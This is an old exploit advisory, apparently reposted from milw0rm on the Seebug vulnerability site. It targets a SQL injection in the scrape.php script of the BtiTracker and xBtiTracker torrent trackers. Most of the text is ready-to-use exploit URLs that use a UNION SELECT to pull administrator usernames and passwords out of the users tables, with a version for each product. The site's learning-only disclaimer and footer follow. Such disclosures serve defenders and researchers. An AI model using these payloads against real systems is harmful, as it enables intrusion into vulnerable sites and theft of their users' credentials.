## BtiTracker/xBtiTracker Remote SQL Injection Vulnerability ## Author: InATeam (http://inattack.ru/) ## Affected versions: BtiTracker <= 1.4.7, xBtiTracker <= 2.0.542 ## Software site: http://www.btiteam.org/ ## ## ============================================================================== ## Exploit: ## ============================================================================== ## http://site/scrape.php?info_hash=1%27) ## +UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0 ## +FROM+users+WHERE+id_level=8/* ## ============================================================================== ## for xBtiTracker we need to specify prefix: ## ============================================================================== ## http://site/scrape.php?info_hash=1%27) ## +UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0 ## +FROM+xbtit_users+WHERE+id_level=8/* ## ============================================================================== # milw0rm.com [2008-08-25]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论